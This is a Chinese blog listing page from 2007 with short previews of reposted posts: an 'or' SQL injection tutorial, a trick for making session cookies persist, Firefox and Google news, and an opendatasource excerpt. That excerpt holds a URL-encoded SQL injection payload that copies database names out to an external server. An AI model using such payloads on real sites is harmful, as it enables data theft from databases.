- 博客(5)
- 资源 (6)
- 收藏
- 关注
RSS订阅转载 新or注入教程
来源:绝对零度blog记得一年前火狐有一位朋友问,如果一个站过滤了and和""的话,改怎么注入啊?当时我随口说了句"or注入",后来又一次看贴的时候,看到他问我该怎么利用呢?我就写了几个简单的语句给他,叫他自己变换,他很感激我,还说网上没有这种方法。我到网上查了查,还真没有or注入专题呢(or 1=1除外),呵呵,所以,一年后的今天,就有了这篇文章。我们用雷霆购物系统做or注入演示。我们先用o
2007-08-13 05:05:00
557
1
转载 破解Session cookie的方法
所谓的 session cookie, 就是站台在你登录成功后,送上一个 cookie,表示你已经通过验证,但与一般cookie不同的是,他并不会存在你的硬盘上,也就是说:在你离开浏览器之后,就会消失,也就是意味:下次你重开浏览器,再进此站,此 cookie 已经不见了。那么,要怎么让这个 cookie 永远有效呢?说永远太久了我们就来个 50 年不变吧...以下是代码片段:set win=ext
2007-08-13 04:38:00
1034
转载 Google提供国际域名注册 与企业应用套件绑定
新闻来源:栖灵免费资源Google的中文apps网页上已经出现了Goolge域名注册服务,此服务是Google与美国Enom合作提供的,注册一年费用是10美元,使用Google checkout,还不能使用Goolge Adsense的收入来支付,不然应该会很受站长欢迎。新域名不需要进行任何配置,因为它已完全配备了贵组织机构所适用的全部 Google 应用程序:个性化的 Gmail、Google
2007-08-13 04:30:00
768
转载 Firefox终极加速技巧
很早很早以前曾经写过一篇“Firefox 终极加速”的文章,可以通过手动修改 user.js 文件来获取理论上的最佳浏览速度,后来发现这种修改方式对于普通用户来说真的有点勉为其难,而且国内的网络环境并不尽如人意,我们所做的 js 优化修改在臃堵的网路上显得那么渺小与无助。不过聊胜于无,让我们暂且先把这些复杂的优化操作变的简单一点,然后再来亲自感觉一下这些已经在网络上流传了很久的提速技巧吧。下面的
2007-08-09 22:34:00
1745
转载 opendatasource
注:直接用#temp这种表好象就不用这么麻烦了insert%20into%20opendatasource(sqloledb,server=************;uid=sa;pwd=0000;database=hack).hack.dbo.yan%20select%20name%20from%20master.dbo.sysdatabases-- insert into op
2007-06-14 03:54:00
1163
MYSQL 注射精华
2008-11-03
Fuzzing, FIST Conference Barcelona, 2006
2007-05-24
Mysql Backdoor analysis
2007-05-24
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人